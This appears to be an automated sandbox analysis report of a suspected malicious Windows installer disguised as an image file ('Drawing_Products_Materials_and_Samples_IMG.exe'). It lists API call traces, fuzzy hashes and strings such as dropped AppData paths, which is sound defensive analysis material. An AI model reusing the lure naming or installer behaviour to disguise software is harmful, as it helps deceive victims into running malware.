                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                                                      • Instruction ID: 0ac01c35b1a0eb5cd592cd1bd468c7a0eb97994f07403c330b4f6ecb6608de49
                                                                                      • Opcode Fuzzy Hash: 6e648e4d60bbbe4240689ab11f1c8e4383af39775b03d872555c2639b8fa9900
                                                                                      • Instruction Fuzzy Hash: 7D01F431628210ABE7194B789C04B6A3698E751359F10C23BF911F76F1D67CDC028B4D
                                                                                      APIs
                                                                                        • Part of subcall function 00402B11: RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033,00000002), ref: 004022DD
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004022E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CloseDeleteOpenValue
                                                                                      • String ID:
                                                                                      • API String ID: 849931509-0
                                                                                      • Opcode ID: ef24d438c4dda026042bb148aacc018fe18a7187f4959e07bc3e84ca0d939caf
                                                                                      • Instruction ID: baeefcf9a9db1f94083355b6d21ea7a3e6d609a59d1c11f41be6f028ad682588
                                                                                      • Opcode Fuzzy Hash: ef24d438c4dda026042bb148aacc018fe18a7187f4959e07bc3e84ca0d939caf
                                                                                      • Instruction Fuzzy Hash: DAF0C232A00114ABDB10BBF48F8EEAE72A89B40318F10453BF601B71C1D9FD5E01966E
                                                                                      APIs
                                                                                      • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A04
                                                                                      • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: EnvironmentExpandStringslstrcmp
                                                                                      • String ID:
                                                                                      • API String ID: 1938659011-0
                                                                                      • Opcode ID: 79b7a0e01db123afcc079197edd82df6480287eb604ff4a0558d32cca6c4bcf2
                                                                                      • Instruction ID: 64e31e8d79c260f471948d3ba476d288fe94427c8d4244796acf024e200d0c72
                                                                                      • Opcode Fuzzy Hash: 79b7a0e01db123afcc079197edd82df6480287eb604ff4a0558d32cca6c4bcf2
                                                                                      • Instruction Fuzzy Hash: D3F0A032F06241EBCB21CF6ADD48AABBFE8DF91350B10803BE549F6290D6788541DB5D
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00010410), ref: 00401579
                                                                                      • ShowWindow.USER32(0001040C), ref: 0040158E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ShowWindow
                                                                                      • String ID:
                                                                                      • API String ID: 1268545403-0
                                                                                      • Opcode ID: add7964105dab1707aaaa84d4f0c0e9d1ab12f2020f5d8ceeb3b73bd8940a280
                                                                                      • Instruction ID: ee0513fff25cb1769eb447bdd8d815014c6f46c9afdd248f46aeede14d5c0a9d
                                                                                      • Opcode Fuzzy Hash: add7964105dab1707aaaa84d4f0c0e9d1ab12f2020f5d8ceeb3b73bd8940a280
                                                                                      • Instruction Fuzzy Hash: 95F0553BA082419FD700CB68EC8086E7BE1EB8630171885BBE101A31C1C2B86E00D718
                                                                                      APIs
                                                                                      • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DC2
                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 00401DCD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnableShow
                                                                                      • String ID:
                                                                                      • API String ID: 1136574915-0
                                                                                      • Opcode ID: 0401fe0a8408a80830016dcf6a5a76bfc0338b17fffd66502b160acb969e5ee0
                                                                                      • Instruction ID: dacfe0cc3fa15e7f928c0b82e119a982ce74a601eef441543fec6a70ee28c1de
                                                                                      • Opcode Fuzzy Hash: 0401fe0a8408a80830016dcf6a5a76bfc0338b17fffd66502b160acb969e5ee0
                                                                                      • Instruction Fuzzy Hash: A9E0C272A04111DBCB10BBB4AE4AA6E33A4EF0035AB104437F202F10D1D6B99C80966E
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 0040582E
                                                                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$AttributesCreate
                                                                                      • String ID:
                                                                                      • API String ID: 415043291-0
                                                                                      • Opcode ID: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                                                      • Instruction ID: d58f26a5a32defaeeb3d325f121af029a3aa60b04f4a5bd1c9a51958cab5ad8a
                                                                                      • Opcode Fuzzy Hash: 2ef177618df3c6e064d17c8612f07db8468e07c34dd9f446758cb9fc7f1f7b71
                                                                                      • Instruction Fuzzy Hash: B8D09E31658301AFEF098F20DE16F2EBBA2EB84B01F10962CB642940E0D6715C15DB16
                                                                                      APIs
                                                                                      • GetFileAttributesA.KERNELBASE(?,?,0040541D,?,?,00000000,00405600,?,?,?,?), ref: 0040580A
                                                                                      • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040581E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      • Opcode ID: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                                                                      • Instruction ID: 3771f6966254d71710a4ae6656988e9437677f6c038d1dffa01ca6e46143e4f7
                                                                                      • Opcode Fuzzy Hash: 5df830ec8081628c906cb6b3941fc93fb328a3f8e8f16404b38d361d687dc965
                                                                                      • Instruction Fuzzy Hash: 84D0C972908120BFC6112728EE0889BBF95DB54271B018B31F969A22F0C7304C628A95
                                                                                      APIs
                                                                                      • VirtualAlloc.KERNELBASE(00000000), ref: 1000285B
                                                                                      • GetLastError.KERNEL32 ref: 10002962
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocErrorLastVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 497505419-0
                                                                                      • Opcode ID: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                                                                      • Instruction ID: bd365418521e43e453085722f926cc1c0e2ab3e4cffdaddced3e06c5c0338b71
                                                                                      • Opcode Fuzzy Hash: ba7f390c09ff9bfcbf5680bad404fe2f4794605870cc1d857870def209431754
                                                                                      • Instruction Fuzzy Hash: D951A5BA808215DFFB24DF64DCC675937A8EB443D4F22842AE608E722DDF34A950CB55
                                                                                      APIs
                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402272
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileStringWrite
                                                                                      • String ID:
                                                                                      • API String ID: 390214022-0
                                                                                      • Opcode ID: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                                                                      • Instruction ID: 594037780aef2bbb7222699eae6bef26f59cc054eef20af3a1b4cc0f61f7743a
                                                                                      • Opcode Fuzzy Hash: 1b535b2f77e26f19bb2a4b73d3ace5ecbe5a17c068042cb8380ef8c757cca308
                                                                                      • Instruction Fuzzy Hash: ADE04F32B001E56ADB207AF18ECDD7FA1589B8434CB15017FF601B62C2DDBC2D418AA9
                                                                                      APIs
                                                                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401719
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: PathSearch
                                                                                      • String ID:
                                                                                      • API String ID: 2203818243-0
                                                                                      APIs
                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EBC,000000FF,?,00000000,00000000,00000000), ref: 00403089
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID:
                                                                                      • API String ID: 2738559852-0
                                                                                      APIs
                                                                                      • RegOpenKeyExA.KERNELBASE(00000000,000003E7,00000000,00000022,00000000,?,?,?,004022CA,00000002), ref: 00402B39
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000), ref: 004025F7
                                                                                        • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointerwsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 327478801-0
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(1000404C,?,?,1000403C), ref: 100026E0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      APIs
                                                                                      • SetFileAttributesA.KERNELBASE(00000000,?,?), ref: 004015A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: AttributesFile
                                                                                      • String ID:
                                                                                      • API String ID: 3188754299-0
                                                                                      APIs
                                                                                      • SendMessageA.USER32(00010406,00000000,00000000,00000000), ref: 00403EEA
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      APIs
                                                                                      • SendMessageA.USER32(?,?,00000001,00403CF2), ref: 00403ECF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DFA,?), ref: 004030B2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                                                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                                                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403C8B), ref: 00403EB8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                                                      • Instruction ID: 4f3b606e1f3b2692e0293683fec327d542fd6d14cd426307677a9e2f6e263f5f
                                                                                      • Opcode Fuzzy Hash: 98b266ebdf0f3c27f3687bff4252ab036e6b5e8ad03fafb5568fabfe7cf076f6
                                                                                      • Instruction Fuzzy Hash: F2A01231404001EBCB018B10DF05C057F21B7503007018421E1404003486310420FF1A
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 483807046c5787cf829f1f025dfbf0267f550373e9d3267be06ec47a5de8a1ec
                                                                                      • Instruction ID: 7c20b9ee9fc925407df665bd309881a2e76883233c2924fbfc7b34ac39994685
                                                                                      • Opcode Fuzzy Hash: 483807046c5787cf829f1f025dfbf0267f550373e9d3267be06ec47a5de8a1ec
                                                                                      • Instruction Fuzzy Hash: 33D0C977B141048BD750E7B8AE8995A73A8FB4132A3244833E502E11A2D579C952961D
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,0040319C,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",00000020), ref: 00405661
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharNext
                                                                                      • String ID:
                                                                                      • API String ID: 3213498283-0
                                                                                      • Opcode ID: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                                                      • Instruction ID: 0ca2c1d1cd56b8494dfdae5d12dc8eb654283e636b180148ddf181c942f9ef5a
                                                                                      • Opcode Fuzzy Hash: cab86ad4fbbc926bf9d9c4068ad28f349fd9e0cffecbcadba0a0645dfc6f61bb
                                                                                      • Instruction Fuzzy Hash: 3FC08C3450C78467C62067309128C677FF0EA62301FAC8CAAF0C863250C23AA8008F2A
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404319
                                                                                      • SetWindowTextA.USER32(00000000,?), ref: 00404343
                                                                                      • SHBrowseForFolderA.SHELL32(?,0079E0D0,?), ref: 004043F4
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 004043FF
                                                                                      • lstrcmpiA.KERNEL32(Call,Unnarcotic33 Setup: Installing), ref: 00404431
                                                                                      • lstrcatA.KERNEL32(?,Call), ref: 0040443D
                                                                                      • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040444F
                                                                                        • Part of subcall function 00405391: GetDlgItemTextA.USER32(?,?,00000400,00404486), ref: 004053A4
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E3F
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                                                        • Part of subcall function 00405DE7: CharNextA.USER32(?,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E51
                                                                                        • Part of subcall function 00405DE7: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E61
                                                                                      • GetDiskFreeSpaceA.KERNEL32(0079DCC8,?,?,0000040F,?,0079DCC8,0079DCC8,?,00000000,0079DCC8,?,?,000003FB,?), ref: 0040450A
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404525
                                                                                      • SetDlgItemTextA.USER32(00000000,00000400,0079DCB8), ref: 004045AB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                      • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\konflikttilstandenes\polyautography\crotalid$Call$Unnarcotic33 Setup: Installing
                                                                                      • API String ID: 2246997448-3913767421
                                                                                      • Opcode ID: d11473757895cbeea30969d5c3e3b32dd3eed759e8bcc0977622a3c2a735b34f
                                                                                      • Instruction ID: 4ae84918bfcb19ccc062e7c66334806cf97196d40f906e8bfa3db2fe6562258c
                                                                                      • Opcode Fuzzy Hash: d11473757895cbeea30969d5c3e3b32dd3eed759e8bcc0977622a3c2a735b34f
                                                                                      • Instruction Fuzzy Hash: E79182B1900209ABDB10AFA5CC81BAF77B8EF85314F14447BFB15B62D1C77C9A418B69
                                                                                      APIs
                                                                                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040265E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: 1ac19ad84c37da439677c9f8c78e0b3ae6552ebd45b2a652de7fa53404bddbf0
                                                                                      • Instruction ID: ad23281ba59b28ec3aa51a9822d84a42962ca700f092f657026e1e1555a452f0
                                                                                      • Opcode Fuzzy Hash: 1ac19ad84c37da439677c9f8c78e0b3ae6552ebd45b2a652de7fa53404bddbf0
                                                                                      • Instruction Fuzzy Hash: D4F0A0326041149AD700E7B4A949AEEB778CB15324F20467FE101E20C2C6B86A859A2E
                                                                                      APIs
                                                                                      • lstrcpyA.KERNEL32(007A0A88,NUL,?,00000000,?,00000000,?,00405A58,?,?,00000001,00405618,?,00000000,000000F1,?), ref: 004058B2
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405A58,?,?,00000001,00405618,?,00000000,000000F1,?), ref: 004058D6
                                                                                      • GetShortPathNameA.KERNEL32(00000000,007A0A88,00000400), ref: 004058DF
                                                                                        • Part of subcall function 0040578F: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,004059A1,00000000,[Rename]), ref: 0040579F
                                                                                        • Part of subcall function 0040578F: lstrlenA.KERNEL32(?,?,00000000,004059A1,00000000,[Rename]), ref: 004057D1
                                                                                      • GetShortPathNameA.KERNEL32(?,007A0E88,00000400), ref: 004058FC
                                                                                      • wsprintfA.USER32 ref: 0040591A
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,007A0E88,C0000000,?,007A0E88,?,?,?,?,?), ref: 00405955
                                                                                      • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405964
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040597E
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 004059AE
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,007A0688,00000000,-0000000A,0040936C,00000000,[Rename]), ref: 00405A04
                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405A16
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405A1D
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405A24
                                                                                        • Part of subcall function 0040582A: GetFileAttributesA.KERNELBASE(00000003,00402C73,C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe,80000000,00000003), ref: 0040582E
                                                                                        • Part of subcall function 0040582A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405850
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                      • String ID: %s=%s$NUL$[Rename]
                                                                                      • API String ID: 3756836283-4148678300
                                                                                      APIs
                                                                                      • wsprintfA.USER32 ref: 100023D2
                                                                                      • GlobalAlloc.KERNEL32(?,?,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023EA
                                                                                      • StringFromGUID2.OLE32(?,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 100023FB
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000000,00000001,100017D5,00000000), ref: 10002410
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002417
                                                                                        • Part of subcall function 100012E8: lstrcpyA.KERNEL32(-1000404B,00000000,?,10001199,?,00000000), ref: 10001310
                                                                                      • GlobalFree.KERNEL32(?), ref: 1000248E
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024B7
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17896186253.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.17896153967.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896219730.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                      • Associated: 00000000.00000002.17896248787.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$AllocByteCharFromMultiStringWidelstrcpywsprintf
                                                                                      • String ID:
                                                                                      • API String ID: 2278267121-0
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404060
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404074
                                                                                      • SendMessageA.USER32(?,0000045B,00000001,00000000), ref: 00404092
                                                                                      • GetSysColor.USER32(?), ref: 004040A3
                                                                                      • SendMessageA.USER32(?,00000443,00000000,?), ref: 004040B2
                                                                                      • SendMessageA.USER32(?,00000445,00000000,04010000), ref: 004040C1
                                                                                      • lstrlenA.KERNEL32(?,?,00000445,00000000,04010000,?,00000443,00000000,?,?,0000045B,00000001,00000000), ref: 004040C4
                                                                                      • SendMessageA.USER32(?,00000435,00000000,00000000), ref: 004040D3
                                                                                      • SendMessageA.USER32(?,00000449,?,?), ref: 004040E8
                                                                                        • Part of subcall function 00403E8C: SetDlgItemTextA.USER32(?,?,00000000), ref: 00403EA6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Item$ButtonCheckColorTextlstrlen
                                                                                      • String ID:
                                                                                      • API String ID: 975578812-0
                                                                                      APIs
                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E3F
                                                                                      • CharNextA.USER32(?,?,?,00000000), ref: 00405E4C
                                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E51
                                                                                      • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030C7,C:\Users\user\AppData\Local\Temp\,773E3410,004032A1), ref: 00405E61
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DE8, 00405DED
                                                                                      • *?|<>/":, xrefs: 00405E2F
                                                                                      • "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe", xrefs: 00405E23
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.17877442021.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID: Char$Next$Prev
                                                                                      • String ID: "C:\Users\user\Desktop\Drawing_Products_Materials_and_Samples_IMG.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 589700163-3558225924
                                                                                      APIs
                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 00403F10
                                                                                      • GetSysColor.USER32(00000000), ref: 00403F2C
